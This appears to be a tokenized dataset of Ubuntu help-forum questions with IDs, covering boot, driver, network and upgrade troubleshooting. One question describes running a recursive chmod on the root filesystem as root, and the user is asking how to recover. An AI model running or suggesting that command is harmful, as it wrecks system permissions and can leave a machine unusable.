dpkg : error processing draftsight.deb ( -- install ) : can not copy extracted data for './opt/dassault-systemes/draftsight/help/korean/korean.qch ' to '/opt/dassault-systemes/draftsight/help/korean/korean.qch.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : draftsight.deb
383756	keyboard modifier to use < caps > with xmodmap	i 've just installed a fresh ubuntu . for the last 2 years i 've used a system that allowed me to use my < capslock > key as a keyboard modifier to get the character i want . for isntance , if i wanted the gbp pound sterling £ symbol i could type caps lock + - + l and it would output £ if i wanted a german umlaut ( ü ö ä ä ü ) i could type caps lock + u + : and it would output ü how is this achieved ? ( i assume something with xmodmap )
383761	firefox does n't start at all	i 'm trying to use firefox , but there 's no way it 'll start . i 'm new to ubuntu and i have tried all the tips i could find but nothing seems to work .
383762	how to configure ctags in kate ?	i use kubuntu lts as my os . how to use ctags in kate ? i selected ctags in the plugin manager window , so that now , by right clicking on any word of my code few ctags options appear . namely : `` go to declaration '' , `` go to definition '' , `` look up '' . but choosing one of these options nothing happens . i think i did something wrong in the configuration : what should i write in the `` ctags database '' and in the `` index targets '' boxes ?
383763	accessing a domain hosted on virtualbox	i 've virtualbox installed on my ubuntu desktop . in my virtualbox i have windows xp pro installed as guest with wampserver & on it i have a named virtualhost which i can access from windows xp but i ca n't access this domain from outside my network . how do i configure my os so i would be able to access it from outside ? this is my setup : virtualbox installed & have set bridged network on virtualbox settings . host : ubuntu 12.04 ( i did n't install lamp on my host ) guest : windows xp pro with wampserver & dnsexit client ( this is the service that i use for dns sync for dyanmic ip ) i added ip 192.168.1.5 on my router 's nat settings to forward on port 80 ( i got this ip from ipconfig on windows ) i think it 's a configuration mismatch , i 'm having a hard time configuring & accessing my site . any suggestion or advice would be great . thanks in advance . output of ifconfig eth0 link encap : ethernet hwaddr bc:5f : f4:67 : f4:86 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :be5f : f4ff : fe67 : f486/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:55146 errors:0 dropped:0 overruns:0 frame:0 tx packets:59931 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33024515 ( 33.0 mb ) tx bytes:11573792 ( 11.5 mb ) interrupt:47 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3673 errors:0 dropped:0 overruns:0 frame:0 tx packets:3673 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:501720 ( 501.7 kb ) tx bytes:501720 ( 501.7 kb ) vmnet1 link encap : ethernet hwaddr 00:50:56 : c0:00:01 inet addr:172.16.33.1 bcast:172.16.33.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:63 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vmnet8 link encap : ethernet hwaddr 00:50:56 : c0:00:08 inet addr:192.168.40.1 bcast:192.168.40.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:63 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
383765	playing movies and no 3g dongle connection after upgrading to 12.04	i have a vodafone webbook that used the linux ( ver10.04 ) that could n't connect through my vodafone k3565 dongle , so i upgraded to it to 12.04 . now it does n't want to play any movies , avi or mp4 , and still no connection through the dongle . the error message for the movies is : an error occurred the playback of this movie requires a xvid mpeg-4 decoder plugin which is not installed . a friend and fellow employee , he is the company it-tech , tried to manually download such a file and a vlc-player , but to no avail . how can i fix it ? is their a way to go back and try and get it to work ? here id a link to the product supplied by vodacom , our local service provider here in south africa . http : //www.techcentral.co.za/vodafone-webbook-review-cheap-and-cheerful-ubuntu-netbook/27074/ run down : 10inch lcd ram : 512mb hdd : 4gb of flash storage ( 2,4gb of which is used by the operating system and applications like openoffice ) processor : 800mhz freescale imx515 processor that is based on the arm cortex-a8 the site says that it has a onboard sim-tray , but my does n't so that 's the reason why i want to use the 3g dongle . i would appreciate all help , but my last resort would be to take it back and ask for the guys to sent it in under warrenty ... thanks for the help .
383766	how can i figure out if my hardware specs are adequate for ubuntu 13.10 ?	how can i figure out if my hardware specs are adequate for ubuntu 13.10 ? my lenovo g505 is a modern laptop which seems to fulfill the official minimums , but gui interaction is slow , even with lubuntu or xubuntu . i 'd like to understand if something is misconfigured or if the hardware is really too limited . i 'm not asking for a specific assessment of my specs , but i 'd like to know -- how do i figure this out ? ( specs : amd e1-2100 dual core , with 2 gb ram and an amd radeon hd 8210m graphics accelerator )
383768	gremlin.canonical saturating my broadband	i am seeing consistent packet push from gremlin.canonical which is really saturating my connection . little investigation on the box reveals this has something to do with woopsie . i have say this has been going on for almost 3hrs and till pushing traffic measurement of about 400kb . should i block this , or could this be some sort of auto updates coming through ? !
383774	how do i configure which programs go through the openvpn tunnel ?	my institute has an internal network that can be accessed via a vpn server . it s turned on with a modprobe tun followed by a service openvpn start ( which asks for remote authentication ) i need openvpn as i wish to ssh to a computing server in the institute network . however , due to certain restrictions , accessing the internet from within the institute network is hard ( and possibly impossible with the added layer of the vpn ) . when i open up chrome and try to access an internet site , it takes me to a captive portal page that does n't let me log in properly ( i presume it detects that i am coming from the vpn ip and not from a regular internal ip ) . how can i tell chrome to use my regular home wifi connection instead of going through the vpn tunnel , while having ssh go through vpn ?
383776	how to get administrator account to see other users files	we setup a samba server with security=user and each user created on ubuntu for backup purposes . windows boxes just basically copying their files to their share . shares etc works fine . but how do we get the administrator account on ubuntu to get access to these other users files . we noticed this when trying to setup lucky backup to backup all the users files to an external drive . when we log in as administrator we can not get access to the various users files , neither can lucky backup . i know it must be groups , chgrp . how can we quickly do this ?
383779	how to compile ralink drivers on newer kernels ?	the `` official '' rt2800 module in the kernel causes low signal , always reconnect , or broke the connection . ( crap ) ages ago i compiled some ralink drivers for linux , theese had rt2860 modules , and my wlan was awesome in speed and performance . but on newer kernels its changed . i have installed build-essential , devscripts , cdbs , gcc , i downloaded the driver from mediatek-page , i decompressed the file , i double check the ~/os/linux/config.mk ( ate , wpa_supplicant e.t.c ) i edited the 2415 the line in ~/common/cmm_wpa.c to wpa_mix_pair_cipher . and : flexiblecipher = mix_cipher_notuse ; to flexiblecipher = wpa_tkipaes_wpa2_tkipaes ; i have the kernel and the headers installed , but the make or sudo make command wo n't work . i use the module rt2800pci 01:00.0 network controller [ 0280 ] : ralink corp. rt3090 wireless 802.11n 1t/1r pcie [ 1814:3090 ] subsystem : micro-star international co. , ltd. device [ 1462:6891 ] kernel driver in use : rt2800pci but 40cm away to router the netbook have half ( or worse ) signal-strenght . any ideas ? ( newer kernels : 12.04 and up ) 3.5.x-x-generic-3.11.x-x-generic here is `` big-diagnostics '' of an oldie netbook ( msi-wind-u135 ) which have this wlan-module . wlan0 ( or ra0 ) will be the wlan , but totally gone on fresh install , wlan1 is usb wlan . http : //pastebin.com/sfye5rlu ( 1 month pastebin )
383781	will ubuntu phones be root-locked ?	i have never bought a smart-phone , because they are all root-locked/jailed . it 's like buying a car with junk in the back and no key to open the rear door . rooting/jail-breaking risks bricking the system and invalidates the guarantee . so what i want to know is simply this : will ubuntu phones be root-locked , root-open , or is it a manufacturer decision and nobody yet knows ?
383784	ibaton router light goes off when lan wire put it on.no internet on wired but there is internet in wireless	i have installed ubuntu 12.04 server lts . and installed xubuntu desktop . on pentium 4 . 512 mb ram.and my router is i baton frm bsnl internet.my prob is when i start the desktop pc the lan wire indicative light on i baton router is not flickering.and when i try to wire put it on and off at regular time then it will on but the internet is gone.but when the lan wire is put itoff then wireless working which is connected to my laptop.please help i am very frustrated and helpless..thank you
383786	gvim startup slow : huge gui delay	vim starts up quickly . gvim takes ages , with or without loading plugins . the -- startuptime option shows : 733.162 467.301 : starting gui 733.945 000.783 : reading viminfo 25801.849 25067.904 : gui delay where is that huge gui delay coming from ? this is on ubuntu 12.04 , running gnome with xmonad .
383788	ubuntu 13.10 gparted in loop searching a hd	i just updated my ubuntu to 13.10 . when i start gparted it searches all partitions of /dev/sda , then begins to search /dev/sdb , but never finishes ... the interface continues completelly disabled ... what 's wrong ?
383791	how do i remove wine and playonlinux completely ?	playonlinux is n't working , so i uninstalled and then re-installed it . but still it is n't working . i think i did not uninstall it correctly . could someone help me ?
383792	ubuntu server 12.04 install raid 1 , slow ( takes over 2 hours )	i am trying to install ubuntu server 12.04 lts on my server but the installation is really really slow . first i thought it was because it has to mirror everything but i assume it should n't take so long . i am currently on the stage of 'wiping swap space for security ' and has been stuck on 13 % ever since ( ~30min ) . i configured the raid 1 with two hard drives ( wd10ezrx ) using the following guide : https : //help.ubuntu.com/12.04/serverguide/advanced-installation.html i 'm absolutely clueless on what this could be or how to resolve this . thanks in advance
383793	ubuntu loads desktop files slowly	after logging into ubuntu ( unity ) , it takes about 30s before applications ( /usr/share/applications/* ) are shown in the dash . my personal files ( images , music , ... ) are listed immediately when entering a search term in the dash . why does it take so long to list these files ?
383798	grub error 17 after 13.10 fresh install	the pc was running , after a very difficult 13.10 install ( nvidia issues ) , but after a reboot the pc came up with grub error 17 and will do nothing else . i 've tried holding the shift key to initiate recovery mode with no success , is there any way to fix this error without another install ?
383801	why is the joydev module enabled on ubuntu server ?	i 'm studying for my lpic level 1 exam and was looking into modules in ubuntu server . i noticed that the `` joydev '' module was enabled on my server and upon running modinfo , realised it is a module to support joystick devices . i just wondered why it would be there in a server installation ? it 's not a vital question but i was just curious !
383804	dpkg : `` package is in a very bad inconsistent state '' how to fix it ?	when i run command sudo apt-get -f i get this error dpkg : error processing gcc-4.8-base : i386 ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : gcc-4.8-base : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm using ubuntu 13.10
383805	unable to boot windows 8 after formatting ubuntu partition and reinstalled ubuntu	i had ubuntu 12.04 lts , and windows 8 , dual boot was working fine..but i had lots of problem with my ubuntu , so one day , out of frustration , i formatted ubuntu drive from my windows , now , i am not able to boot windows , grub rescue opens up . so , to fix that , i installed ubuntu again on the same hard drive partition as before using a live usb thinking that boot repair would solve it for me . but , after installing boot-repair , i get a message `` efi detected , please check options '' now , clicking recommended repair , i get an error message.. efi detected . please use boot-repair-disk-64bit ( www.sourceforge.net/p/boot-repair-cd ) which contains an efi-compatible version of this software . i am stuck now , what to do with this iso file that i downloaded , moreover what to do overall to solve my problem .
383808	how to restore windows 7 loader	i have this situation : i have windows 7 installed on my laptop . then decided to install ubuntu 12.10 alongside it . the installation was successful and i 'm able to have a dual boot , windows 7 and ubuntu . after sometime i decided to delete ubuntu from my laptop so that i can use the space that was used by ubuntu . i deleted the partition used by ubuntu using the disk management of windows . after restarting the laptop , grub rescue appear and windows 7 is not loading anymore . trying to fix my problem , i decided to use the linux live-usb with ubuntu 12.10 on it . after the installation the loader screen appear , the ubuntu and windows 7 is already there . trying to boot on windows 7 by selecting it on the selection , error appears saying that the windows is not able to load due to some software changes . what will i do to retrieve the windows and all the files on that partition ? your help will be greatly appreciated .
383810	question about browser mail app	i have an outlook.com email account so when i open outlook.com with firefox it asked me to install an email app ( same happens for twitter , reddit .. ) now that i have this i have this ( not so ) fancy icon in my unity . i want this icon to indicate when i have new mail , i also want a blue envelope sign in my notification bar when i get new mail in my outlook.com browser tab ( which is open all the time ) . i even think it is supposed to work like this , but does n't . am i doing something wrong ? also when i click outlook icon in unity bar ( which still has the old hotmail logo ) a new firefox window open , but i want a new tab in my existing firefox instance . is this possible ?
383816	wifi and lan not working in ubuntu lenovo g580	i just bought a lenovo g580 laptop , and installed ubuntu 12.04 alongside windows 8 using vmware workstation , everything works fine except for the wifi and lan . kindly help me out from this problem .
383821	`` check if you are using third party repositories '' what this means while upgrading ?	i am getting an error message while updating ubuntu 12.04 lts . the error messege is : '' check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get-install-f '' i tried to run the above command in terminal but it is also showing an error . can someone help me on this ?
383824	manage flag question - can i remove raid flag ? what can i safely change to ?	i have a sata 750gb hard drive that i took out of my failed wd my mybook and plugged into the controller on my ubuntu machine . ubuntu 12.x lts desktop does see the drive in disk utilities but the partitions are showing up as 3 ext3 and 2 swap partitions ... the ext3 partitions have raid flags on them . i just want to get the data off the drive ; so i need to be able to access the data so i can copy it off . better question : what can i do to access the data - i am not a linux wiz .
383831	should i be concerned about the linux.darlloz worm ?	as an ubuntu user , any tips on how linux.darlloz could affect ubuntu and ways to prevent it ?
383835	ubuntu stopped booting after bios update on np500p4c-ad2 ?	i updated the bios in my notebook , a n500p4c-ad2br to version p06rab and it no longer boots linux from the hard disk ... apparently the secure boot option in the bios no longer works , and it will just recognize windows boot manager now . if i tell it to boot from the hard drive directly ( grub2 ) it just ignores it . if i disable wbm in the boot device list , the bios says there are no boot devices . anybody know a work around ?
383837	lubuntu : script starting during lxsession for every users	i 'm trying this , but in lubuntu 13.10 , the same script 1 ) in /home/user/.config/lxsession/lubuntu/autostart works 2 ) in /etc/xdg/lxsession/lubuntu/autostart does not works how can ( and where ) i can enable a default script that start on every users session , the current users and the ones i will add in future ? my aim is a config script that programmatically init every starting session of my users ( running apps , default icons on desktop , etc , etc , ) thanks .
383841	is n't there a file recovery program with gui ?	i want to recover deleted files from a sd card , but ways you can do it with the commands looks difficult , complicated and doens't give all the steps with the commands . is n't there a easier way or less complicated way with program that has a gui , that also works great ?
383845	ubuntu on vmware to access vpn connection of win7 host	i have ubuntu 13 guest installed on vmware 9 ( workstation ) . windows 7 64-bit is a host . connection to the internet is available on host only via cisco anyconnect vpn client . there is no other internet connection available . is it possible to bridge from ubuntu to vpn and gain access to the internet ?
383846	i 've just installed ubuntu 12.04 on dell inspiron 1501 and after it updated i lost all ability to connect to the internet	the laptop previously used widows xp and connected to the internet using wi-fi , however it now wo n't even connect with an ethernet cable now . it worked up until the updates after i installed it . i 've tried some of the advice on here already , but i still ca n't get it to work .
383847	my mythtv setup menus changed to greek , anybody else ?	after the last update , my mythtv setup menus in the frontend and backend changed to greek , i think it is just a font issue because it looks like letter substitution rather than language . either way english is the language that is set everywhere i can find , and i ca n't find any greek font set anywhere . anybody else had a similiar issue ? any idea how to fix it ? mythbuntu 12.04 , mythtv 0.26
383850	where are sources for ubuntu sdk qtmultimedia ?	as someone who intends to blend c++ with qml , i need to wrap my head around some examples . the phablet-team has a camera app that does a good job of demonstrating that . i noticed that camera is a type the camera app imports from qtmultimedia if i understand correctly . so digging under the hood some more i want to look at the qtmultimedia sources that ubuntu-phone uses . hopefully the ubuntu phone 's camera app source is this one , but i am not certain : http : //bazaar.launchpad.net/~phablet-team/camera-app/trunk/files is that correct ? where are the specific qtmultimedia sources which this camera app imports ?
383857	ubuntu 13.10 boot problems	i installed ubuntu 13.10 from a usb flash and the installation was successful.however , when i restarted my pc as ubuntu asked it didnt load and windows 8 started automatically without letting me to choose an operating system . i installed ubuntu on an empty drive and i cant find that drive when windows 8 loaded
383859	ubuntu one error	credentialserror dbusexception ( dbus.string ( u'process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 ' ) , ) i am totally new to ubuntu . inherited this computer and have never used this operating system before so i need some major help . this is just one error i am getting . i need to get in here to open a terminal , ( so i am told ) . and then i need to search for a different problem there . answers have been helpful here but i just keep inquiring a new problem as i go . so if anyone can help me even if it through chat i would appreciate it . help ! ! ! ! ! ! michelle
383861	ubuntu and datecs lp-50 non-fiscal pos printer	i attached printer to rs232 to usb switcher and then plugged in usb . what steps i must do to get this printer to work . there are no official ubuntu drivers for this printer , is it even possible to use this printer with ubuntu ?
383862	webmin proftpd - limits	i use proftpd and configure it via webmin . i want to limit users access to certain directories 1 . their homes 2 . /sample . so i go to files and directories- > limit users to directories and option : home directory works fine . the problem is with other directory . it is set just like home directory but users still can see only their home folder without /sample . what happened ? ubuntu 13.10
383863	how can i publish nightly builds / beta on ppa	i am distributing some of my software using ppa . however , i would like to use the same for nightly builds or development versions , so that beta testers can use aptitude to download latest testing versions . how can i achieve this ? what i want to do is either : by default all users get latest stable version , but if they specify a beta version somehow , they get it even if it 's not recommended for regular use . or there would be 2 packages , one stable and one would be the same software but unstable . while this is easier to do , ( basically i would submit same software twice just with different name ) it does n't look correct to me . is there any proper way ?
383864	brother mfc-j870dw network printer drivers	i have a brother mfc-j870dw printer that is attached to my network . i have had no success in finding out how the thing works on my ubuntu 13.04 64bit computer . i am wondering if i am just a dummy with printers or if it cant print at all any help would be extremely appreciated .
383866	my laptop battery drains quickly after unplugging !	i used ubuntu 13.04 and i did n't have any problem but after upgrading to 13.10 my laptop battery drains quickly after unplugging ! i dont know why but it shows the battery charge wrongly . when i unplug it after some minutes it hibernates . so what should i do now ? laptop : lenovo u165 ubuntu : 13.10 64bit
383867	ubuntu 13.10 wo n't connect to wifi	when i boot up with windows 7 , i have internet connect , but with ubuntu 13.10 it keeps asking for my password over and over again . does anyone know what to do ?
383870	restore permissions of ubuntu 10.04 after running `` chmod 700 -r / '' as root	i have run : chmod 700 -r / with root access on ubuntu 10.04 . is there any way for recovering from this situation other than reinstall ? then i again ran : chmod 777 -r / to fix it and now i have lost network access on all users ( even root ) and lost the permission to even shutdown the system on my regular user . what am i supposed to do ? i appreciate your help .
383872	indexers - which are in use by which projects ? nepomuk , zeitgeist , tracker ?	i am trying to get an idea if indexers like zeitgist or nepomuk are in active use by the various desktops or are they being phased out and replaced ? most of the documentation online for these seem to be a year or three old , which might indicate that they are not in active development . what does kde use now and what are the plans for the next year or so ? same with gnome , unity , lxde . where are they going in the next year ? ubuntu 14.04 will be a lts support release , so it would be good to know what it 's fundamental indexing technology will be .
383877	after upgrading to 13.10 kernel panic - not syncing	until today i used 12.04 . this afternoon i ugraded to 12.10 then 13.04 and finally to 13.10 . everything seemed normal during the updates . afterwards on 13.10 i kept getting an error message related to oracle virtualbox . since i do n't use it anymore , i removed the package with synaptic . following the next restart , i was greeted with a kernel panic screen ( http : //i.imgur.com/4d6hrj3.jpg ) . i 've tried to boot older kernels without success ( 3.8.0-33-generic , 3.5.0-43-generic , 3.2.0-56-generic ) and the recovery mode did n't work either . ( on the puprle background screen i can choose any options only to end up with the same result : a flash of the lines , all starting with error , then back to the recovery menu . ) how do i resolve this ? thanks in advance .
383878	ubuntu 13.4 not booting up/ will installing ubuntu from usb erase what i have	yesterday i was going to update my 13.4 to 13.10 by terminal.but whenever i try to set my brightness my netbook freezes for a bit and then it gets going normally.during the update it froze and i thought it would get going normally for a bit so i went to sleep but when i awoke it was still frozen . i turned it off and on and when it says ubuntu then it loads it just takes me to black screen with a `` _ `` flashing . i have a bootable ubuntu 13.10 usb which i tried and it worked . so my question is will i have to install ubuntu again and will it erase all my other stuff and could i fix the flashing _
383880	how do i get suspend working on an hp dv4t ?	suspend does n't work on my laptop . when the laptop tries to suspend , the screen turns off briefly , some system-looking text appears for a bit , the screen turns off again , then the screen turns back on and i am at a locked-screen prompt . i tried : the suspend button on the unity menu sudo pm-suspend sudo acpitool -s dbus-send -- system -- print-reply -- dest= '' org.freedesktop.upower '' /org/freedesktop/upower org.freedesktop.upower.suspend deleting /etc/pm/sleep.d ( as suggested here ) sudo modprobe -r tpm_tis modfying /proc/acpi/wakeup to switch everything but the power button to disabled . putting suspend_modules= '' alx '' into /etc/pm/config.d/modules writing a script that forces the graphic card to reboot itself using a `` kick '' from chvt1 and chvt7 and putting it in /etc/pm/sleep.d/20_custom-ehci_hcd ( @ sushantp606 's answer below ) trying the same thing as # 9 in a different way ( the third part of @ sushantp606 's answer below ) sudo s2ram this kernel does n't have kms support . machine is unknown . this machine can be identified by : sys_vendor = `` hewlett-packard '' sys_product = `` hp pavilion dv4 notebook pc '' sys_version = `` f.24 '' bios_version = `` f.24 '' none of these solved the problem . # 9 changed the behavior a little ( it cycled more quickly between trying to go to sleep and waking up ) . any suggestions what i can look at doing next ?
383881	opening abiword files	abiword files no longer ( 12.04 ) open themselves , but need to be called by the main menu to do so - with abiword ( what else ! ) my finger is so used to the double click on the file name to open it , that it does it automatically , and now has to be corrected with a few more clicks . can i have a macro , or its equivalent , to make my second click still do the job ?
383886	how can i mount a vmware shared folder ?	i am new to ubuntu and i 'm trying to mount the vmware shared folder in my ubuntu guest machine running on a windows 8.1 host . i created shared folder with vmware ( vm > settings > option > share folder ) then i created a shared folder name cshare and the host path is c : \ then i open the terminal in ubuntu 12.04 type mkdir /media/wshare then i type mount -t vmhgfs .host : /cshare /media/wshare then i add this code to /etc/fstab for auto mount .host : /cshare /media/wshare vmhgfs defaults 0 0 everything is working fine but when i execute the commands i am getting this message : you must have r/w access to the filesystem or be root i also tried putting the following into /etc/fstab : .host : /cshare /media/wshare cifs defaults , rw , user , auto , exec , utf8 , ttl=5 , uid=1000 , gid=1000 0 0 .host : /cshare /media/wshare vmhgfs defaults , rw , user , auto , exec , utf8 , ttl=5 , uid=1000 , gid=1000 0 0 any idea how to mount a vmware shared folder in ubuntu ?
383890	apache2 setting up multiple domains	so i 've looked and google for a few hours on setting up multiple domains , and i 'm about to give up . here 's my latest attempt : ports.conf : # if you just change the port or add more ports here , you will likely also # have to change the virtualhost statement in # /etc/apache2/sites-enabled/000-default # this is also true if you have upgraded from before 2.2.9-3 ( i.e . from # debian etch ) . see /usr/share/doc/apache2.2-common/news.debian.gz and # readme.debian.gz # namevirtualhost *:80 listen 80 < ifmodule mod_ssl.c > # if you add namevirtualhost *:443 here , you will also have to change # the virtualhost statement in /etc/apache2/sites-available/default-ssl # to < virtualhost *:443 > # server name indication for ssl named virtual hosts is currently not # supported by msie on windows xp . listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > sites-available/data.paulbgd.me : < virtualhost *:80 > serveradmin webmaster @ localhost servername www.data.paulbgd.me serveralias data.paulbgd.me # indexes + directory root . directoryindex index.html documentroot /var/www/data.paulbgd.me/ # cgi directory scriptalias /cgi-bin/ /var/www/data.paulbgd.me/cgi-bin/ < location /cgi-bin > options +execcgi < /location > # logfiles errorlog /var/www/data.paulbgd.me/logs/error.log customlog /var/www/data.paulbgd.me/logs/access.log combined < /virtualhost > no errors on apache restart . the domain 's dns has it 's a record set to my vps 's ip . edit : forgot to mention something . when i go to the domain i do n't get a `` ca n't connect '' page , i just get a blank page . and on that note : /var/www/data.paulbgd.me/index.php : < h2 > works ! < /h2 >
383891	i dont have surround sound while playing games with kraken 7.1	just as the title said , i could n't get it to work . i have calibrated the headset with razer synapse 2.0 , chose 7.1 option in the mixer but nothing worked . when i play ac iv black flag , the sound is stereo at best .
383893	installation failed	i can not install vlc media player and adobe flash plug in from ubuntu software center . for vlc it said package dependencies can not be resolved and for adobe flash plug in it said check your internet connection though i have internet connection . i have tried all the possible alternatives . i even tried command and followed the things written in google . please tell me how to fix it as i really need them . thank you .
383896	unable to get grub after upgrading to windows 8.1	i have ubuntu along with windows8 . recently i upgraded to windows8.1 . after that i am not getting the grub , which i used to get with windows 8 . but i can access ubuntu 13.04 by pressing f9 while starting and in boot options , ubuntu , then i get grub and i can access ubuntu . files are as usual . i tried to run boot repair but its rectifying this problem . http : //paste.ubuntu.com/6393514 it says , the boot files of the os now in use-ubuntu 13.04 are far from the start of the disk . your bios may not detect them . i dont have idea whar it is . can anyone help on the same ?
383898	which remixes of ubuntu are officially supported|branded by canonical ?	like the topic . i know that the unity remix is the official one , but is this the only one ? i know about kubuntu , xubuntu , ubuntu gnome.. , but which of them and others are offcial remixes ?
383902	does libmapi-2.0 exist ?	after spending hours trying to compile evolution-mapi from source on 13.10 , i 've finally run into checking for libmapi ... no configure : error : libmapi was n't found ! please install at least libmapi-2.0 ! though libmapi-dev is installed on my system , i 've no evidence that libmapi-2.0 even exists . is there a fix for this ?
383906	syntax error while running an install.sh file	i have a problem with a .sh file . this file will install a. py file in the same folder ! the file looks like this : # ! /bin/bash/ python install.py `` $ @ '' can somebody pleace help me ?
383907	how to remap keys with dvorak layout enabled ?	i 'd like to remap a key or two ( mostly my tab key ) , but i 'd also like to use the dvorak layout . i 've found that an .xmodmap file makes using the dvorak layout impossible to use . my question is are there any ways to remap the key without causing me this interference problem ?
383910	eaglecad stopped working after update to 13.10	if i try to execute the program from terminal i get this error : /home/rick/eagle-6.4.0/bin/eagle : error while loading shared libraries : libxcursor.so.1 : can not open shared object file : no such file or directory the program worked fine in 13.04 .
383911	what are the `` complex legal concerns '' negated by ubuntu advantage ?	i am looking at the benefits of subscribing to ubuntu advantage and i have noticed the following line in the list of benefits to being a ubuntu advantage subscriber : legal coverage : ip indemnification coverage so you can easily deploy ubuntu in your business without complex legal concerns what exactly are the complex legal concerns that are negated by ubuntu advantage ?
383913	i want cinnamon but not mint	i have ubuntu 13.10 and i want the cinnamon desktop , but i have read ( software center ) that it makes ubuntu crash . does anybody have cinnamon working with ubuntu 13.10 ?
383915	goes into purple screen with black squares trying to login ( using wubi )	yesterday i installed wubi and when i tried to log in it would turn purple and black squares , also i could n't type in my password.today i uninstall it and re-installed it i tried to log in and same problem wont let me type and turns purple with black squares.before ubuntu boots up it says could not display this in video mode or something like that.i 'm running windows vista .
383919	skype does n't launch after nvidia driver installation	i just installed nvidea drivers and found that skype does n't launch . i tried several solutions that i found here ( like that ) , but no one helped . so , that 's what i see if i try to launch skype from terminal : $ skype error : ld.so : object '/usr/lib/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . /usr/bin/skype : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 and my xorg.conf : section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` device '' identifier `` default device '' driver `` nvidia '' option `` nologo '' `` true '' option `` glshaderdiskcache '' `` true '' endsection section `` module '' load `` glx '' endsection can you help me ? thanks in advance .
383922	how do i install ubuntu without losing personal data ?	i have a windows computer with a lot of personal data ( about 50 gb or more ) . i want to install lubuntu , but i do n't want to lose all my files when installing . i do n't want to dual boot , either . i do n't have physical external storage available ( flash drives , discs , etc ) . i do have 15 gb on google drive , but it is not enough ( nowhere else offers nearly that much storage ) .
383924	how to i get to my linux partition ?	so i got a new hard drive . first , i downloaded unbuntu on to it , because i did n't have windows 7 yet . so a few days later i bought windows 7 , and partitioned it on to the hard drive . now , when i start the computer , it goes straight to windows 7 . that 's fine and all , but how do i get to the unbuntu partition that 's somewhere on the hard drive still ? i believe it is an extended partition , not a primary .
383925	`` ca n't check signature : public key not found '' while upgrading , why ?	i want to upgrade my ubuntu 13.04 to ubuntu 13.10 . i 'm unable to do via gui . [ the reason why i 'm unable to do so : via software updater , i proceed ahead and click upgrade ( for upgrading my os ) . i authenticate by providing my password . then it proceeds and downloads upgrade tool . that time only ( while downloading the tool ) error message comes `` system program problem detected '' . it then does n't proceed ahead and i click to report the problem ] so , i tried via command line but here also i could n't succeed upgrading my os . for the same i ran $ sudo apt-get update then i ran $ sudo apt-get dist-upgrade and then : ravbholua @ ravbholua-aspire-5315 : ~ $ sudo do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1,135 kb ] fetched 1,135 kb in 6s ( 32.9 kb/s ) authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' gpg exited 2 debug information : gpg : signature made friday 01 november 2013 10:34:27 am ist using dsa key id 437d05b5 gpg : ca n't check signature : public key not found authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . ravbholua @ ravbholua-aspire-5315 : ~ $ please suggest how to go ahead and upgrade my os .
383931	login screen loop 12.04 after problems with ati driver and removing	i 'd like to start by thanking all of you guys for the great community - i have learned a lot going through the questions and trying solutions . i am stumped on this current error and would greatly appreciate your help and thoughts . the background is that i installed the ati 12.8 drivers for my 7950 . on reboot this led to the tty1 screen without going to the login screen ( not going to lightdm ) ; i uninstalled the proprietary driver and fglrx as per question1 and question2 now on reboot , it launches lightdm 's login screen , but i am now in a login loop . i have verified the ownership of my .xauthority file as user1 as well as the rest of /home/user1/ as per question3 but this has not fixed the login loop . i believe it is still a driver/graphics card problem but am lost on how to proceed . here are my .xsessions-error and xorg.0.log files : .xsessions-error : no protocol specified no protocol specified xrdb : resource temporarily unavailable xrdb : ca n't open display ':0' no protocol specified no protocol specified xhost : unable to open display `` :0 '' no protocol specified no protocol specified xhost : unable to open display `` :0 '' openconnection : connect : no such file or directory can not connect to brltty at :0 no protocol specified no protocol specified no protocol specified no protocol specified ** ( gnome-session:2257 ) : warning ** : can not open display : the xorg.0.log is at http : //paste.ubuntu.com/6496049/ thanks again for all your help .
383936	how do i upgrade from ubuntu 12.10 to 13.04 ?	how do i upgrade from ubuntu 12.10 to ubuntu 13.04 ? i have tried nothing yet , however this is trying my patients , i have been here for over an hour trying to ask a simple question and this is my last attempt ! ! !
383937	trying to install to usb hdd	i want to install to an external usb hdd . drive is currently formatted with one ntfs partition . booted from cd . selected something else . selected dev/sdb . hit install now . get error that says `` no root file system defined please orrect this from the partitioning menu '' not sure what to do here . want to make sure i do not mess up my internal hdd . please provide directions .
